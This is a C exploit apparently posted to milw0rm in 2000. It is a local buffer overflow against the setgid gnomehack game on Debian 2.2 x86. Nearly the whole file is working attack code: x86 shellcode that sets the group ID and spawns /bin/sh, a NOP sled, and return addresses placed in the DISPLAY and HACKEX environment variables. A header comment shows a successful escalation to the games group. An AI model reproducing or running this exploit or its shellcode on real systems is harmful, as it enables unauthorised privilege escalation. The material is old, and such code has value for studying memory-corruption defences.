/*
* (gnomehack) local buffer overflow. (gid=games(60))
*
* Author: Cody Tubbs (loophole of hhp).
* www.hhp-programming.net / pigspigs@yahoo.com
* 12/17/2000
*
* Tested on Debian 2.2, kernel 2.2.17 - x86.
* sgid "games"(60) by default.
*
* bash-2.03$ id
* uid=1000(loophole) gid=501(noc)
* bash-2.03$ ./h 0 0
* Ret-addr 0x7fffe81c, offset: 0, allign: 0.
* Can't resolve host name "????????????????"!
* sh-2.03$ id
* uid=1000(loophole) gid=501(noc) egid=60(games)
* sh-2.03$
*/
#include <stdio.h>
#define OFFSET 0
#define ALLIGN 0
#define NOP 0x90
#define DBUF 256 //120(RET*30)+((RET))+132(RET*33)
#define GID 60
static char shellcode[]=
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0"
"\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31"
"\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
"\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x69";
long get_sp(void){
__asm__("movl %esp,%eax");
}
void workit(char *heh){
fprintf(stderr, "\ngnomehack local exploit for Debian 2.2 - x86\n");
fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)\n\n");
fprintf(stderr, "Usage: %s <offset> [allign(0..3)]\n", heh);
fprintf(stderr, "Examp: %s 0\n", heh);
fprintf(stderr, "Examp: %s 0 1\n", heh);
exit(1);
}
main(int argc, char **argv){
char eipeip[DBUF], buffer[4096], heh[DBUF+1];
int i, offset, gid, allign;
long address;
if(argc < 2){
workit(argv[0]);
}
if(argc > 1){
offset = atoi(argv[1]);
}else{
offset = OFFSET;
}
if(argc > 2){
allign = atoi(argv[2]);
}else{
allign = ALLIGN;
}
address = get_sp() - offset;
if(allign > 0){
for(i=0;i<allign;i++){
eipeip[i] = 0x69; //0x69.DOOT:D
}
}
for(i=allign;i<DBUF;i+=4){
*(long *)&eipeip[i] = address;
}
gid = GID;
shellcode[10] = gid;
shellcode[22] = gid;
shellcode[24] = gid;
for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
buffer[i] = NOP;
}
memcpy(heh, eipeip, strlen(eipeip));
memcpy(heh, "DISPLAY=", 8);//HOME||DISPLAY
putenv(heh);
memcpy(buffer+i, shellcode, strlen(shellcode));
memcpy(buffer, "HACKEX=", 7);
putenv(buffer);
fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address, offset, allign);
execlp("/usr/lib/games/gnomehack/gnomehack", "gnomehack", 0); //Mod path if needed.
}
// milw0rm.com [2000-12-04]